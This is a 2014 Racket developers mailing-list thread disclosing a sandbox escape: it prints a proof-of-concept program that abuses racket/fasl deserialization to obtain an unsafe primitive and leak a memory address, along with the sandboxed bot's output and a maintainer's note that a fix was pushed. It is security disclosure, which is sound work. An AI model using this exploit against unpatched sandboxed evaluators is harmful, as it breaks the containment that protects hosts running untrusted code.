[racket-dev] racket/fasl allows sandbox escape

From: Sam Tobin-Hochstadt (samth at cs.indiana.edu)
Date: Thu Jul 10 07:13:25 EDT 2014

Credit for this discovery goes to Jens -- I just wrote the email.

Sam
On Jul 10, 2014 2:36 AM, "Matthew Flatt" <mflatt at cs.utah.edu> wrote:

> I've pushed a repair. To double-check it, change 1140 to something like
> 1340, since the table of primitives changed as part of the repair.
>
> Thanks for the report!
>
> At Wed, 9 Jul 2014 09:39:50 -0400, Sam Tobin-Hochstadt wrote:
> > The following exchange with rudybot, which is running the programs in
> > a sandbox, demonstrates the issue:
> >
> > 09:35 <samth> rudybot: eval (let () (local-require compiler/zo-marshal
> > compiler/zo-structs racket/fasl) (fasl->s-exp (zo-marshal
> > (compilation-top 3 (prefix 0 '() '()) (let-void 1 #t (install-value 1
> > 0 #t (primval 1140) (localref #t 0 #f #f #f )))))))
> > 09:35 <rudybot> samth: ; Value: #<procedure:unsafe-fx+>
> > 09:36 <samth> rudybot: eval ((let () (local-require
> > compiler/zo-marshal compiler/zo-structs racket/fasl) (fasl->s-exp
> > (zo-marshal (compilation-top 3 (prefix 0 '() '()) (let-void 1 #t
> > (install-value 1 0 #t (primval 1140) (localref #t 0 #f #f #f )))))))
> > vector-ref vector-ref)
> > 09:36 <rudybot> samth: ; Value: 32681168
> >
> > The relevant program is:
> >
> > (let ()
> >   (local-require compiler/zo-marshal compiler/zo-structs racket/fasl)
> >   (fasl->s-exp (zo-marshal
> >                       (compilation-top 3
> >                          (prefix 0 '() '())
> >                          (let-void 1 #t
> >                            (install-value 1 0 #t (primval 1140)
> >                              (localref #t 0 #f #f #f)))))))
> >
> > Sam
> > _________________________
> >   Racket Developers list:
> >   http://lists.racket-lang.org/dev
>

Posted on the dev mailing list.